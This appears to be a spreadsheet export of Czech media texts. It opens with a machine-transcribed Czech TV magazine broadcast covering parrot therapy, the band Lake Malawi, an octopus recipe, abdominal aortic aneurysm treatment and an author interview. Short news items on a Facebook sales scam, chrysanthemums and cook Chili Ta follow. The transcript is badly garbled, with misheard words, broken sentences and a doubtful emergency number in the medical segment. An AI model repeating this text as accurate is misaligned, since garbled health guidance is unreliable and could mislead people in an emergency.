nejvíce dotazu zkusíme zodpovědět. -Dnes večer na jedničce... kdo zabil ředitelku pracovního centra? Otázka pro komisařku Florence v nové minisérii. Zpěvačka Helena on, herec Jiří Vyorálek a mladá herečka Emma Klárová Dušinská. Tři témata. Dnes večer na jedničce. -Hlasujte pro svého favorita ve StarDance. Lucie on, Patrik Hartl , čili pak, Marta Dancingerová , Jana Paulová , Martina Ptáčková . Oskar Hes a Filip Blažek . Posílejte SMS ve tvaru který vidíte na obrazovce na telefonní číslo uvedené na obrazovce. StarDance, když hvězdy tančí. Zítra večer na jedničce a v iVysílání. -Díky lásce k hudbě víc cítil. -Jste moji operou která oslaví český národ. -A víc sžil... -Jste moje múza. -Sháním někoho, kdo umí psát. -Hned se do toho pustí. -Krásnohorské. -Mezi námi nic není? -A jen na hudbu a lásku se mohl spolehnout. -Neslyším. -Když všechno kolem ztichlo. -Umírá, slečno. Tichem a samot. -Máte hudbu v sobě. -Film režiséra Marka Najbrta - Smetana. -Lékař který vypadá jak Paul Newman . V Americe jsem si s tím užil dost. -Premiérový díl v neděli většinou na jedničce. -Zdravím všechny rodiče. -Nový pořad pro rodiče právě teď na ČT Edu. U -Ukážu vám, co může pomoci i vašem dětem s výběrem střední. Čím chce být? -Chci být doktor, chci být herec. -Jaké jsou jeho silné stránky a motivace? Jde, nejde? Baví, nebaví? Výběr střední školy je velká věc. Nebojte, společně to zvládneme. Více na VV. ČT Edu. Cz. Tak držím palce. -Sledujete páteční Sama doma. Kdesi v následujících minutách představíme papouščí terapii. Vy už je možná tady dobře slyšíte. Jak si takovou terapii představit, to nám poví zoo terapeuti. Dobrý den. -Dobrý den. -Spolu s vámi je doprovod v podobě papouška. Já doufám že jim nepopletu jména. Slyšela jsem Klára, Rio's a Kraken . -Ano. -Slyšela jsem správně. Vy jste průkopníci s asistencí ptačí. V čem je tato metoda ojedinělá? -Ojedinělá je v tom, že to je kontaktní terapie. Vlastně s velkými papoušky. Nemusí být tedy jen s velkým, mohou být jakýkoli papoušci. Pokud k tomu mají nějakou povahu. Je to jako u všech zvířat, která si vybíráme k terapii. Tak je to u těch papoušků, papoušek prvotně musí na to mít tu povahu. Další věc je tam to, že papoušci se dožívají hodně vysokého věku. Tudíž i tu terapii dělají jenom krátkou dobu. Do nějakých svých 30 let. Pak už se jim mění povaha a chtějí mít svůj klid. -Aha. -A právě proto lidi kteří parkují s těmi papoušky, tak je trošku problém s tím. Protože tím že se papoušek dožije 80 nebo 120, což je nějaký průměrný věk, tak vlastně ten papoušek potřebuje někoho dalšího, k sobě. A vlastně my když přestaneme nebo nebudeme, tak jim musíme zajistit nějaký kvalitní život, od který můžou dožít dál. Tímto způsobem je vlastně ta terapie dost jakoby ojedinělá. Právě díky tomu věku těch papoušků. A nikdo to s nimi vlastně ještě nezkouší. -Co vás k této netradiční činnosti přivedlo? -Vlastně to byla Clarka. My jsme terapie dělali s jinými zvířaty, i děláme s jinými zvířaty. Ale Clarka, která vlastně byla u nás a dostala se k nám, nám tak vlastně úplně náhodou při skupinové akci pro děti v našem rodinném centru, tak s Klárkou si začala povídat malá holčička. Jelikož našem centru máme psychoterapeuty i lékaře, tak díky té lékařce jsme zjistili, že holčička byla zneužit. Tím jsme začali tu terapii daleko více rozvíjet. -To je úžasné. To jsem z toho v úžasu. Máme tady krásný zvukový doprovod. Nicméně fyzioterapie, socioterapeutické i psychoterapie, to jsou všechno obor, které ornitolog terapie obsahuje. Jak si to můžeme představit a jak to funguje v jednotlivých oblastech? -Vždycky záleží na klientovi. Jaký on má přístup ke zvířatům. Někteří se bojí. Ale je to tak, že vlastně navozují klid, pohodu. A souznění. Protože papoušci jsou vlastně zvířat, která jsou jakoby nejvíc povahově podobná lid. Vlastně se v nich odráží, jsou naším zrcadlem. A tím vlastně ten papoušek, který svým způsobem komunikuje s člověkem který je osamocený, nebo se duševně cítí sám, tak v něm vlastně hledá kamaráda. A ten člověk je pak klidnější. Dokáže se mu svěřit. Je to přesně ten příklad, který jsem uváděl. -Už se hádají... -Ano. -Jak vypadá takový samotný víc? Můžete nám popsat? -Výcvik? No ten je o tom, že vlastně papoušky musíme učit veškerým rušivým Elle, které se kolem nás pohybují. Ale nikdy je nenaučíte úplně všem. Vždycky se objeví něco co ještě nepoznali. Což je dost nebezpečné u papoušků, protože ti odlétnou, když se jim něco nelíbí. Ale je to dlouhá cesta, a je to celý život těch papoušků. Protože opravdu... jsou, ty se kterými se třeba 10 let nesetká. A pak přijdete do zařízení, kde třeba je jenom barevná knihovna. A tu knihovnu mají v knihovně. A teď jsou tam ty pachy. A ty papoušci to neznají v tomto spojení. A vlastně přestanou chtít pracovat. Takže v tu chvíli my musíme ukončit tu aktivitu. Proto máme ještě další zvířata, pokračujeme s těmi dalšími zvířaty. Ale ty papoušky musíme zklidnit. A domluvit jiný termín. A nebo jiné prostředí. -Takže může se stát, že i v den terapie... -Ano. -Že to třeba odvolá, že zjistíte že to není úplně...? -Ano, samozřejmě všechna ta zařízení, kam chodím, dostanou pravidla a dostanou všechno. Ale ne vždycky se třeba pochopíme na výběru místa. Úplně ideální jsou venkovní prostory, na zahradách. Jak pro děti, tak pro ty seniory. -Papoušků je ale celá řada. Které druhy jsou ty nejvhodnější, právě v terapii? -V terapii jsou... záleží na tom. Máme papoušky kteří hodně mluví, což jsou kakadu řeči, žako, to jsou ti papoušci kteří chtějí mluvit. Tito barevní krasavci, ti zase sami navozují pro lidi radost a štěstí. Jenom ty barvy a přítomnost papoušků, které nemají každý den. U někoho to nabudí třeba vzpomínku na dětství. Hlavně tam jde o tu komunikaci, vždycky, s tím klientem. -Já vám pro tuto chvíli děkuji že jste nás trošičku zasvětili do papouščí terapie. A těšíme se na příštím povídání zase svá. -Děkujeme. -A my už si teď budeme povídat s frontmanem kapely Lake Malawi , zpěvákem Albertem Černým. A přizvali jsme také dramaturga ČT Martina Poláka. Abychom společně prodali probrali záznam živého koncertu z festivalu metronom, šlo o oslavu 10 let laik. ČT dnes večer odvysílá tento. Pánové hezký. -Hezkého. -Hezký. -Pánové, začneme tím ohlédnutí. Jaké to pro vás bylo 10 let s kapelou? -Tak nahoru dolů. Já jsem po rozpadu Charlie Streit se musel občas z toho vzpamatovat, chvilku. Potom bylo docela zásadní, že přišla Eurovize . A to nás docela nakoplo. Změnila se skladba našich posluchačů. Že polovina je z Česka a polovina je ze zahraničí. A začal jsem psát písničky, s dalšími skladateli, s producenty z jiných zemí. Což bylo vlastně pro mě novinka. Já jsem vlastně do té doby bral tak, že všechno musí být hodně osobní. Hodně autobiografické a hodně jako ze srdce. A bála jsem se, že vlastně přítomnost dalších lidí ve studiu mi to nějak naruší. No ale zjistil jsem... měl jsem dobrou, prostě, že naopak pokud jsou ti lidé ve studiu ti správní, tak oni naopak pomohou země dostat tu pravou jako, tu autentickou energii. A vlastně tu písničku ještě vylepší. -Na festivalu metronom, odkud uvidíme právě přenos, i 100. výročí oslavil. Která hvězda byla součástí toho konzol, prozraď? -Byl to saxofonista kapely, jedné z nejslavnějších anglických kap. Ono to vzniklo tak, že my jsme se potkali v Newcastle když jsme hráli s Lake Malawi malé anglické turné po klubech. A když jsme dohráli, tak po koncertě za námi přišel ten týpek a říkal že se mu to líbí. Já jsem říkal: to sem. Ty jsi také muzika? On říkal, jsem saxofon. On říkal najatým se Nighteen seventy five. Mně spadla čelist, a potom když jsme nahrávali písničku tak jsem mu poslal nahrávku, a on řekl že se mu to líbí. Na koncert na festivalu metronom přiletěl z turné po celém světě, kde jejich skupina odehrála přes 150 koncertů. Takže si myslím že to pro něj byl i trošku kontra, z těch obrovských hal jako Wembley , někam do Prahy jako na výstavy. Ale naopak říká, že je rád že vlastně koncertuje dál. Protože často po těchto velkých tour, když člověk nemá co dělat, tak na vás může padnou taková lehčí Kepka. -Režisér Pavel Jirásek říká, že jste to poměrně dlouze spolu diskutovat. Jak ten koncert bude vypadat. Martin, jak hodnotíte ten výsledek a co tomu vlastně předcházelo? -Já jsem nesmírně rád že kluci z Lake Malawi , hlavně alb, převzali tu výzvu. V minulosti jsme natáčeli koncert Tata Bojs , a myslím že to znamená pro tu kapelu posun. Je to prezentace toho největšího energetického koncertu, který je stadion nový, pomalu. Je to mnoho tisíc lidí. Koncertní show se velmi vydařila a měla větší odpich než deska. Protože tam vždycky ten živý dotyk, komunikace s publikem. A ještě ruku v ruce jako s hostem, s ze zahraniční slavné kapely, a ještě s Dominikou Haškovou , tak si to sedlo v něco nadčasového. A troufám si říci že ten posun jako pro diváky se nám podařilo zprostředkovat koncertem, který byl pod taktovkou Pavla Jiráska. -V dubnu jste jedno turné už odjeli. Co dál? Na co se můžeme těšit? -No my teďka máme v plánu takovou šílenost. My jednáme s českou ambasádou Zambie , nebo s ambasádou v Zambii , ČR. Že jsme dostali pozvánku na festival který je v Malawi . Ten festival se jmenuje Celá kapela jestli se vydá příští rok do Afriky a jestli si zahrajeme v místu názvu naší kapely. Je to šílená představa ale hrozně by mě to lákalo. Když bůh dá, a tak kapela Lake Malawi zahraje u jezera Malawi . -Martine to je výborný ty, balíte se se štábem ČT a poletíte s Martinem? -Bylo by to hezké. Pro nás je to vždycky výzva, nejenže děláme zázemí koncertu ale děláme i dokumenty. Toto je krásná dokumentární situace. Která by mohla být hezkým doplňkem dnešního koncertu. -Tak to je takový tip. -To máme rádi. -Alberte vy už jste to trošku nastínil. Jak vzpomínáte na Eurovizi a co se po ní změnil? Změnila se i skladba vašich posluchačů? -Jo, no tak to už jsem říkal. Teďka nás poslouchá víc lidí z jiných zemí. Ale Eurovize jako taková je poměrně dost šílená. Průměrný euro vyzní fanoušek má rád převleky, zná všechny písničky Nasr. Sleduje statistiky. A jsou to opravdu takový... takové postavy, s big band k teorii, dalo by se říct. Zase na druhou stranu jsou strašně sympatičtí a já si vážím toho, že s některými udržujeme vztahy jako kapela doteď. Například jedna holka, jmenuje se Linda, to je Francouzka která bydlí v Tokiu . Ona na nás dokonce, když jsme dělali v dubnu koncert, tak přiletěla z Tokia do Prahy . A říkala dvojtečka no tak jsem tady. -Tomu se říká fanynka. -No krása. -Musím jen podotknou že vlastně v rámci pražského koncertu Metronom bylo zajímavé vidět více generační spektrum toho publika. Nebyla to jen záležitost dejme tomu dvacátníků, ale bylo to fakt širší spektrum. Dejme tomu do nějakých 65 let. Všichni se bavili. Někdy byly velmi dojatí, a zejména ty fanynky, které vzhlíželi na Alberta třeba u písničky kde měl sólo na k Labi , tak to bylo hezky dojem. -Oni už trošku zestárli od Charlie snídaně kyberšikana den a ze Střekova. -Proto zveme všechny diváky a divačky na Sama doma. -Bude dneska koncert na ČT art tak si ho nenechte ujít. A štěkáme se na náš příští vstup, kde se dočkáte hudební ukázky v podání Alberta Černého . Těšíme se na to. Šéfkuchařem dnešního vysílání Sama doma je Jan Miňha, který nám slíbil připravit něco málo z portugalské kuchyně. My bychom potom mohli přizvat tudíž i Alberta Černého , který v Portugalsku nějakou dobu žil, aby to zhodnotil. -Určitě. -Honzo hezkého, já jsem si o vás četl, že vy jste vařil různě posvěť. Brazílie , Nový Zéland , Nizozemsko apod. Tak co je typické právě pro tu portugalskou kuchyni? -Pro tu portugalskou kuchyni je vlastně specifická ta středomořská kuchyně. Ryby, mořské plody. Hodně zeleniny. A nějaké brambory. A samozřejmě hodně bylinek. Lehká jídla. A olivový olej. -No už vidí, že nějaké mořské plody se nám tu smaží. -Tak. -Co tu bude, co nám dnes připravíte? -Máme tu nachystanou chobotnici. Ta chobotnice, někdo ji má rád, někdo nemusí. My, když ji připravujeme, je dobré ji pořádně uvařit. Potom zprudka zapéct, aby měla tu krustu. Dneska to budeme podávat s dýňovým pyré, mám tady Salátek, který se skládá soli, listové zeleniny, rajčat a paprik. Z ochucuji to citronovou šťávou, olivovým olejem. Který v o portugalské kuchyni hraje docela. -Říkal jste pořádně uvařit tu chobotnici. To znamená když já si tady ta chapadla zakoupím - je to v syrovém stavu? -Je to v syrovém stavu. -Jak dlouho vaří, hodinku? -No klidně i déle. -Aha. -Záleží vždycky na stavu té chobotnice. Je dobré pro masírovat solí. Můžete vidět jak s tím kuchaři mlátí o stůl. Je to tak. Ty chobotnice dokážou být tuhé. Já jí vařím s červeným vínem , s kořením. Bobkový list. A vařím ji pomalu. Vařím ji pomalu, aby se mi vlastně hezky provařila, změkl. Abych jí potom zatáhl a byla pěkně křupavá. -Takže klidně fakt i déle, než tu hodinku? 2-3? -Určitě. Počkat až se to zatáhne. Přidal jsem tam olivový olej ať se to za to. -A dýňový krém máme? -Máme z Hokkaida, to pyré je takové je, ne mám tam trošku, soli a perfektně to k tomu. -Takže ta chobotnice, potom ta chapadla už jsou Ochu, Senát třeba jenom solí a pepřem? -jsou jen osolená. Oni vlastně víc nepotřebují. Ta chobotnice dobrá sama o sobě. Není potřeba tam cpát další. Navíc byla vařená ve víně, v tom várce s tím kořením. -Podáváte to se salát, obyčejně zrají, petržel,? -Černé, vy petržel. Je to dochucené solí. Takto to úplně stačí. -Věřím tomu, že v Portugalsku k tomu budou podávat nějaké dobré? Zase červe, myslíte že je lepší? -Já myslím že jakékoli víno portugalské bude dobré... -Máme tedy krásně naservírovanou chobotnici. V příštím vstupu. Nalákáte nás, co si uděláme? -Uděláme si tresku s takovými pečenými brambory a opět tam bude hodně bylinek a bude to dochucené citronem. -Těšíme, díky Honzo. -Díky. -V rámci zdravotního tématu se dnes věnujeme výduť břišní aorty. A když se jedná o vážný zdravotní problém, tak je několik způsobů lék. Do těch nás teď zasvětí pan doktor Robert Vlachovský. Jedním ze způsob léčby je určitě klasická opera. -Vlastně se chirurgicky z velkého relativně řezu na břiše musí odstranit ten postižený úsek a většinou se to nahrazuje takovou speciální protézou. Vyrobenou z umělého materiálu. Která vlastně se nahradí v té pozici, kde byla původní aorta. Nahoře je to někde uprostřed břicha, pro orient. A případně se to našívá někdy až do třísel. Proto pacienti mají někdy řezy nejen na břiše, ale i v tříslech, kde se to vlastně napojuje na ty tepny, které zásobují dolních končetin. A vlastně vše co je mezi tím, je nahrazeno umělou cévní protézou. A ta výduť, která dosáhla určité velikosti, je tím vlastně odstraněn. -Já se jenom jednou otázkou vrátím k tomu našemu předchozímu vstupu. Neřekli jsme vlastně, jaké jsou příznaky když mi aorta praskla? A jestli je rozhodující čas, jak rychle musím jedna? -Čas je esenciální věc. Příznaky jsou jednoduché, jsou tři. Je to poměrně velká a silná bolest v břiše a v zádech, někdy. Je to šokový stav. S nízkým tlakem, kdy ten člověk může být až jako v kolapsu. A pak je to hmatná, a pulzující rezistence na břiše. Zvětšující se objem břicha. To jsou takové tři základní věc. Obzvlášť u pacientů kteří to v rodině měli nebo vědí, že mají výduť, je to jasný signál k tom, aby neztráceli čas a ihned volali 150. -V rámci léčby je dnes také nová přiblížit možnost? Můžeme to přiblížit? -Je to alternativa otevřené operace. A vlastně to znamená, že to odstranění té vidí u těch chirurgicky, se do té výdutě zavede něco jako nové potrubí. Je to vlastně přes třísla zaváděný způsob, vlastně takový speciální vyztužené trubičky. Jsou většinou přesně na míru těm pacientům, podle velikosti teda ne výdutě i podle velikosti toho pacienta. Laicky to vysvětlujeme často tak, jako kdyby si člověk představil že v metru. A tam to med, ten průběh toho tubusu, je výduť. Tak do toho zavedeme jenom dvoumetrovou, menší, stejně dlouhou ve stejném průběhu trubici. A to je ta nová trubice, do této nové trubice se zavede ten krevní tok. A tím se vlastně sníží tlak na tu původní stěnu toho metra, když to tak vysvětluji. Anebo na původní stěnu té výdutě. A zabrání se té hlavní komplikace. To je to praskl. To je často mnohdy fatální komplikace. Velmi elegantně se to řeší v okamžiku, když o té výduti víme a ještě nemá známky prasknutí. A je v klid. Tam je obrovský rozdíl v tom, jestli operujeme pacienta tzv. plánovaně. Prostě i když je to operace která má svá rizika, tak určitě nepřesahují 2-5 %, nějaká vážná rizika. Ale pokud ten pacient je přivedený do nemocnice v okamžiku, když už ta výdutě praskl, tak ta procenta se mění dramaticky. A blíží se třeba až k 75 % úmrtnost. Pokud ten pacient vůbec přežije transport do nemocnice. -No ta metoda Eva asi bude o něco šetrnější. Je vhodná pro vše? -Šetrnější je ten vlastní výkon. Pro všechny vhodná není. Hodně to záleží na konkrétním pacientovi. Na konkrétní anatomii jeho cévního systému. Zda je to možné, v daném konkrétním případě aplikovat, z tuto metodu. Často to záleží také na pracoviště, kde se ten člověk dostane. Někde se mnohem více používá otevřená operace a někde se častěji používá ta endovaskulární technika. Ono to také záleží na tom, jakým způsobem nejvhodnějším a nejrychleji se ten pacient dá ušetřit. To třeba v případě rupturu se dělá většinou otevřeně. V případu plánovaných výkonů se ta endovaskulární technika dělá častěji a častěji. Určitě to není pro každého. Nedá se říci že to je metoda zázračná na rozdíl od klasické operace. Každá z metod má své plusy a mínusy a záleží vždycky na konkrétním pacientovi, lékaři a pracovišti kde se objeví, jakým způsobem se to bude řešit. -Jak dlouho trvá rekonvalescence po operaci? Jsou asi nutná nějaká režimová opatření? -Je to velmi individuální. Většinou, jak jsme říkali v prvním vstupu, to postihuje hodně, kteří jsou v pokročilejším věku nad 70 let. Z toho vyplývá i to, že ta rekonvalescence odpovídá tomu věku a dalším chorobám, které ty pacienti mají. Pobyt v nemocnici a minimálně týden. Většinou o něco déle. A ta vlastní rekonvalescence se dá počítat opravdu na týdny, někdy i měsíc. Mě samozřejmě to souvisí s tím, že pacient má v sobě trvale nějaký implantát. Cizí materiál. Na to musí myslet. Je tam většinou velký řez, na tom břiše. Čili další. Jak ochránit si to břicho od nějakého dalšího poranění, kýly atd. Ono to má hodně aspektů ta pooperační péče a rehabilitace. Odhadem mluvíme spíše o týdne. -Děkujeme moc. V příštím vstupu už se budeme věnovat diváckým dotazům. Takže připomínám dvojtečka můžete stále k tématu výdutí břišní aorty posílat dotaz. Ještě máte čas. -Velmi oblíbená mezi čtenáři, a oceňovaná odborníky. V pátečním vydání Sama doma nám dělá milou společnost spisovatelka Kateřina Tučková . Kateřino , vy se nebojíte takového toho nabourávání stereotyp. A vyjadřování vlastního názoru, k různým tématům. Je to pro vás součást té vaší odborné profese, spisovatelské? Anebo je to pro vás i osobně důležité? -Je to pro mě osobně důležité. Je to tak, že k nějaké šíři aktuálních problémů se nemám úplně čas jako vyjadřovat. Že tu pěnu dní zkrátka nechávám nějak odplynout. Zajímají mě jako vybraná témata, jako třeba byl odsun. Poválečný odsun československých Němců. Nebo v poslední knize tedy to, jak jsme se chovali k ženám za minulého režimu. K řeholnic, které byly tak jako vrostlé do sociální struktury a pomáhali mnoha lidem v různých ústavech, že? A my jsme je potom nechali vlastně zmizet v internačních klášterech. Tak jako většinou je to tak, že většinou mě zaujme nějaké téma. A potom ho sleduji napříč časem a napříč historií. A pak mám potřebu... když zjistím že nedostatečně zpracované... ho převést do románové. A cítí, že té je tam prostor i pro můj názor. Nějak se k tomu postaví. Říci třeba tím příběhem, že ne všichni Němci byli podporovatelé národního socialismu. Že byli i lidé jako byla jednadvacetiletá matka půlročního dítěte, na kterou vina dopadla naprosto neoprávněně. Nebo mám potřebu ukázat, že během toho začátku komunistického režimu se takto nakládalo s lidmi, kteří byli velice prospěšní společensky. A nějak to tedy jako nabídnout, ten můj postoj, širší čtenářské. A považuji to i za takové jako své. Že... že mám radost, když se jako skrze ty mé knihy podaří nějakou situaci alespoň trošku změnit. Což třeba v případě toho přístupu k poválečnému odsunu se to docela podařilo. -Kniha žitkovské bohyně se dotýká žen v Bílých Karpatech . Ty mají dá se říci výjimečné schopnosti. Možná by se dalo říct, že jsou to až trošku čarodějky? Co si myslíte, že to přenese načtená? Co by to mělo sdělit čtenářům? -Moc jsem chtěla, abychom si vlastně uvědomil, že mezi námi vždycky žili lidé, kteří třeba měli nějaké schopnosti, které neumíme jako dostatečně zařadit. Že byly společensky prospěšná. Právě k Žitkovských bohyň ním se scházeli lidé, kteří byli potřební. Jejich pomoci, buď z lékařské nebo spíš jako psychologické, třeba také často. A úplně z nejširšího okolí. Ale my jsme vlastně k nim v tom minulém století přistupovali s takovým respektem, přestože to byl fenomén tento bohování, přestože to byl fenomén jak říkají historikové až od šestého století. Převážilo to, že socialistická medicína to všechno nazývala jako šarlatánství a podvodnictví. A neměla vlastně citlivost pro nějaké ty alternativní metody. Takže jsme skrze tento přístup úplně jako smetli tento starobylý, úžasný fenomén. Který by přece byl jako velkým bohatstvím. Nebo byl by... protože už zanikl. Byl by velkým kulturním bohatstvím, pro naši zem. Tak mě to vlastně mrzelo a chtěla jsem to zase nabídnout čtenářů. Aby se společně s těmi hrdinkami té knihy jako podívali na to, co všechny ty Žitkovské boh</t>
  </si>
  <si>
    <t>189840</t>
  </si>
  <si>
    <t>20241101_233_3243560363_8a80655df05cbf12c3b2.html</t>
  </si>
  <si>
    <t>8a80655df05cbf12c3b2</t>
  </si>
  <si>
    <t>Pivo zatím proudem nepoteče</t>
  </si>
  <si>
    <t>Pivo zatím proudem nepoteče Podvodník výčepní zařízení nedodal ilustrační snímek zdroj: archiv Ve čtvrtek 31. říjny se na šumperské policisty obrátil poškozený muž, který ve facebookové skupině pod názvem „Udíš, udím, udíme“ sedl na lep podvodníkovi, který zde nabízel k prodeji výčepní zařízení za částku 6,5 tisíce korun. Minulý týden na inzerát zareagoval a prodejce oslovil. „Domluvili se na uvedené ceně a platbě za doručení ve výši 160 korun. Kupující tedy peníze na základě požadavku prodejce poslal. Krátce na to ale zjistil, že po zaslání finančních prostředků, prodejce svůj profil smazal,“ uvedla tisková mluvčí policie Olomouckého kraje Miluše Zajícová, která upřesnila: „Kupující se snažil situaci ještě zachránit a kontaktoval neznámého pachatele tak, že opět zaslal z účtu částku jednu korunu na účet prodejce a do poznámky napsal příjemci zprávu s žádostí o navrácení finančních prostředků. Zpráva ale zůstala bez odezvy a zboží poškozenému také prodejce nedodal. Případ šetříme jako přestupek proti majetku.“ Autor: red., pis M. Zajícová Fotogalerie Autor: M. Zajícová Autor person M. Zajícová</t>
  </si>
  <si>
    <t>13650</t>
  </si>
  <si>
    <t>2780</t>
  </si>
  <si>
    <t>20241101_234_3243531670_a5febc35e27c45e74a9e.html</t>
  </si>
  <si>
    <t>a5febc35e27c45e74a9e</t>
  </si>
  <si>
    <t>Chryzantémy ze supermarketů obvykle v květináči dlouho nevydrží. Mohou začít vadnout už po 2 dnech</t>
  </si>
  <si>
    <t>Chryzantémy ze supermarketů obvykle v květináči dlouho nevydrží. Mohou začít vadnout už po 2 dnech Chryzantémy v květináčích upoutají pozornost zářivými barvami a bohatostí květenství. Ale většinou jde o rychlý efekt a během pár dní začnou chřadnout. Květinovým znakem tohoto podzimního období jsou chryzantémy neboli listopadky. Jsou to květiny chladnějšího období a jejich barvy začnou zářit v době, kdy všechno ostatní na zahradě již odkvetlo. A nejen na zahradě, ale také na hřbitovech. Chryzantémy jsou tradičně spojeny s obdobím Dušiček a my je přinášíme na hroby svých blízkých, kteří už nejsou mezi námi. Chryzantémy jsou královnami podzimu Ne že by se chryzantémy nějakým způsobem pojily s úmrtím, jejich volba jako výzdoby na Dušičky je dána spíše tím, že svátek zesnulých je stanoven na 2. listopad. A to jsou právě chryzantémy ve své plné kráse, a naopak přinášejí radost a život do pochmurného podzimu, uvádí se na webu ExpertSergeFerrari. Mnozí z vás si pěstují chryzantémy sami, a to jak na záhonech, tak i v květináčích na balkonech a terasách. Jiní jsou odkázáni na to, co jim nabídne zahradnictví, květinářství, supermarkety. Je třeba podotknout, že do květináčů se musí volit odrůdy, které jsou mrazu odolné, a také je pro bohaté květenství přihnojovat vícesložkovými hnojivy. Listopadky v záhonech jsou mnohem odolnější jak vůči mrazu, tak si dokáží najít živiny v půdě. Kdežto v květináči mají v tomto směru značné omezení. Pokud se na Dušičky chystáte vyčistit náhrobek, ihned zpozorněte. Většina Čechů povrchu akorát uškodí A tak ti z vás, kteří musí chryzantémy koupit třeba v květinářství či supermarketu, by se měli mít na pozoru. Prodávané šlechtěné druhy, které vypadají na první pohled úchvatně svým bohatým květenstvím, často své prvotní kouzlo rychle ztratí. V květináčích se obvykle prodávají rychlené rostliny, aby byly efektní pro oko, ale ty většinou nevydrží nápor podzimního počasí. Záhy jim začnou měknout stonky a žloutnout listy, spousta květů začne usychat a půvab zářícího bohatého květenství přijde vniveč. Proč chryzantémy v květináčích nic nevydrží Jednak nejsou do květináčů vysazovány odpovídající druhy, jednak květiny dlouho trpí ve skladech. Chybí jim přístup světla a teplota vzduchu je tam na tyto podzimní rostliny vysoká, jak píše web Kobieta. Také zálivka není prováděna správně, a tak některé exempláře trpí suchem, jiné jsou přemokřené. A takové podmínky ovlivňují negativně životnost těchto krásných květin. Když se pak dostanou do venkovních podmínek, utrpí šok a začnou rychle uvadat. Stává se zcela běžně, že dva až tři dny po nákupu začnou chryzantémy měnit barvu květenství, uvadají a hnijí. Bývají totiž ošetřeny chemickými přípravky pro prodloužení trvanlivosti. Nápor těchto přípravků udrží květiny ve skvělé kondici právě tak do doby, než je nakoupíte. A pod vlivem podzimního počasí, které by ve své podstatě mělo být pro listopadky přirozené, začnou rychle chřadnou. Chryzantémy v květináčích si dobře prohlédněte. Nesmí mít opadané a nažloutlé listy, ani uschlých několik květů – to už je špatné znamení. A hlavně stonky musí být pevné, pružné a zelené. Měkké gumovité stonky značí, že rostlina za pár dní zajde. Na BydlímeÚtulně jsme napsali také o tom, jak a čím byste měli čistit náhrobky. Zelenec chocholatý: Rostlina se skutečně úžasnými vlastnostmi, která dělá téměř zázraky 21.11.2020 Je těžké najít člověka, který by na zelenec chocholatý již někdy nenarazil. Tzv. chlorophytum je známým obyvatelem téměř každého bytu a domu. Jak si kromě nenáročné péče a dekorativního vzhledu zasloužil lásku tolika lidí? Mohou za to jeho úžasné vlastnosti, které chce mít doma jednoduše každý. Vypěstujte si snadno vlastní sazenice vinné révy, které vám zkrášlí vaši zahradu 7.9.2020 Vinná réva je mezi mnohými zahrádkáři velice oblíbená. Pokud se jí dobře daří, plodí sladké a velice chutné bobule. Lidově se plodům vinné révy také říká hroznové víno . Primárně se tohle ovoce pěstuje v teplejších oblastech, a především pak na Moravě , kde se ze zralých hroznů vyrábí lahodný a také zdravý nápoj v podobě červeného, nebo bílého vína . Abyste si však dokázali i v domácích podmínkách vypěstovat šťavnaté hrozny v hojném množství, je vhodné z révy naštípat řízky, které necháte naklíčit. Poradíme vám, jak na to. Fíkus patří mezi nenáročné pokojové rostliny, nicméně i při jeho pěstování je nutné dodržovat několik pravidel 15.2.2021 Daroval vám někdo z blízkých fíkus a vy o něm nic nevíte? Potom se inspirujte následujícími radami, které pěstování významně usnadní. Jedná se o rostlinu bezesporu nenáročnou, avšak základní péči ji musíte poskytnout. Buďte první kdo přidá komentář Napište komentář Vaše e-mailová adresa nebude zveřejněna. Komentář Autor: Jiří Kolář Autor person Jiří Kolář Rubrika transition_slide Rady a tipy</t>
  </si>
  <si>
    <t>13370</t>
  </si>
  <si>
    <t>2320</t>
  </si>
  <si>
    <t>20241101_235_3243565247_62df76d9004243747836.html</t>
  </si>
  <si>
    <t>62df76d9004243747836</t>
  </si>
  <si>
    <t>Chili Ta promluvila o těžkých začátcích v&amp;nbsp;Čechách: Šílené mrazy na stánku</t>
  </si>
  <si>
    <t>Chili Ta promluvila o těžkých začátcích v&amp;nbsp; Čechách : Šílené mrazy na stánku Kateřina Kiliánová | 1. 11. 2024 Kuchařka s vietnamskými kořeny Chili Ta (33) září nejen v kuchyni, ale i na parketě. Přijala totiž výzvu bojovat po boku svého tanečního partnera Jakuba Mazúcha v letošní řadě taneční soutěže StarDance. Do kolikátého kola se probojuje, je ve hvězdách. Jedno je však jisté – Chili se ničeho nebojí. Chutě slavných Za jejím postojem stojí nelehké začátky a životní příběh. Když jí byly pouhé čtyři roky, přestěhovala se s rodiči z rodného Vietnamu do České republiky . „Otec sem přišel v osmdesátých letech v rámci spolupráce mezi komunistickými státy. Pracoval tu jako dělník v továrně,“ vzpomínala Chili v rozhovoru pro iDnes. „Chtěl vydělat peníze a připravit zázemí, abychom mohli přijet za ním, což se stalo v roce 1995,“ dodala Chili. Navzdory mrazu i dešti První roky nebyly jednoduché – rodiče pracovali od časného rána na tržnicích. „Naši vstávali každý den ve čtyři ráno a jezdili na trhy, kde si postavili stánek a celý den prodávali. V zimě i v minus dvaceti stupních,“ popsala finalistka MasterChefa 2020. Ačkoli pro ni Vietnam zůstává důležitou součástí identity, její srdce už patří Česku, které si zvolila jako svůj domov. „ Česko je pro mě domovem. Stále ho považuji za místo, kde bych chtěla strávit většinu života,“ svěřila se Chili. I když přiznává, že hlavně v zimních měsících ji láká zmizet… Kateřina Kiliánová | 21. 10. 2024 Záliba v houbaření se nevyhýbá ani slavným! Jejich instagramové profily totiž praskají ve švech houbovými úlovky. Kdo našel houbu a kdo… Sdílet Síla sociálních sítí Chili Ta je nejen kuchařka, ale také úspěšná influencerka a autorka kuchařky Špetka chili. Zaměřuje se na tvorbu obsahu nejen o vaření, ale i o životě ve vietnamské komunitě. „Sítě jsou můj zdroj obživy a každý měsíc musím vydělat na plat dalších čtyř lidí,“ uvedla pro Reportér Magazín s tím, že si na kvalitě obsahu velmi zakládá. Kromě vietnamsko-české fúze v kuchyni, se zaměřuje na zodpovědné využívání surovin a vyhýbá se plýtvání, což vysvětluje i životními zkušenostmi své rodiny, která měla k jídlu vždy respekt. Pro značku Živina vyvinula sérii omáček a pest. Dále plánuje druhou kuchařku a spolupracuje s českými historiky a Akademií věd , aby podporovala informovanost a kvalitu v gastronomii . Související články Emma Ernatová | 3. 11. 2024 Upřímný a trochu sarkastický, takový je Bořek Slezáček (56). Muž mnoha tváří exceluje na divadelních prknech, filmech, seriálech a natáčí… Jana Čiháková | 22. 10. 2024 Tak tomu se teprve říká láhev s hvězdným otiskem! Do alchymie výroby prémiového alkoholu totiž začínají pronikat i jména z… Kateřina Kiliánová | 